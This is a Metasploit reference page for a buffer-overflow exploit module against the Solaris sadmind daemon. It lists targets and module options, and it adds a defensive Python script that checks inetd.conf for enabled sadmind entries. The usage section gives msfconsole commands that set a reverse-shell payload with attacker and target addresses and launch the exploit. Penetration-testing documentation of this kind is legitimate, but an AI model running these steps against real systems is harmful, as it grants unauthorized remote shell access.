Metasploit Penetration Testing Framework
Sun Solaris sadmind adm_build_path() Buffer Overflow
This module exploits a buffer overflow vulnerability in the adm_build_path() function of the sadmind daemon. The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle time is specified with the -i command line option. The sadmind daemon may also be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run even if there are no active requests.
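An added example (not part of the Metasploit module or the original page): because sadmind is launched on demand by inetd, a host audit can check whether an inetd.conf entry for it is still enabled and which idle time -i sets. The sample configuration and the function names are constructed for illustration, and the classic Solaris inetd.conf field layout is assumed.

```python
import os

# Constructed sample in the assumed Solaris /etc/inetd.conf layout:
#   service  socket-type  protocol  wait-flag  user  server-path  argv...
SAMPLE_INETD_CONF = """\
# Constructed sample; sadmind entries follow.
ftp stream tcp6 nowait root /usr/sbin/in.ftpd in.ftpd -a
100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind
#100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -i 300
"""


def find_sadmind_entries(conf_text):
    """Return one finding per inetd.conf line whose server program is sadmind."""
    findings = []
    for line_no, raw in enumerate(conf_text.splitlines(), start=1):
        stripped = raw.strip()
        enabled = not stripped.startswith("#")   # commented-out entries are disabled
        fields = stripped.lstrip("#").split()
        # Match on the server path (6th field) so prose comments that merely
        # mention sadmind are not reported.
        if len(fields) < 7 or os.path.basename(fields[5]) != "sadmind":
            continue
        args = fields[7:]                        # fields[6] is argv[0]
        idle_time = None                         # None: default idle time applies
        for i, arg in enumerate(args):
            if arg == "-i" and i + 1 < len(args):
                idle_time = args[i + 1]
            elif arg.startswith("-i") and len(arg) > 2:
                idle_time = arg[2:]
        findings.append({"line": line_no, "enabled": enabled, "idle_time": idle_time})
    return findings


def sadmind_enabled_in_inetd(conf_text):
    """True if inetd would start sadmind on request (at least one active entry)."""
    return any(f["enabled"] for f in find_sadmind_entries(conf_text))


if __name__ == "__main__":
    for finding in find_sadmind_entries(SAMPLE_INETD_CONF):
        state = "ENABLED" if finding["enabled"] else "disabled"
        print(f"line {finding['line']}: sadmind {state}, -i {finding['idle_time']}")
```

An enabled entry means the service is reachable through inetd; a host with no enabled entry can still run sadmind if it was started from the command line, which this check does not cover.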
Authors
- Adriano Lima < adriano [at] risesecurity.org >
- ramon < ramon [at] risesecurity.org >
Exploit Targets
- 0 - Sun Solaris 9 x86 Brute Force (default)
- 1 - Sun Solaris 9 x86
- 2 - Debug
Usage Information
$ msfconsole
msf > use exploit/solaris/sunrpc/sadmind_adm_build_path
msf exploit(sadmind_adm_build_path) > show payloads
msf exploit(sadmind_adm_build_path) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(sadmind_adm_build_path) > set LHOST [MY IP ADDRESS]
msf exploit(sadmind_adm_build_path) > set RHOST [TARGET IP]
msf exploit(sadmind_adm_build_path) > exploit
Module Options
| Option | Description |
| --- | --- |
| RHOST | The target address |
| RPORT | The target port (default: 111) |
| BruteStep | Step size between brute force attempts |
| BruteWait | Delay between brute force attempts |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| ONCRPC::tcp_request_fragmentation | Enable fragmentation of TCP ONC/RPC requests |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |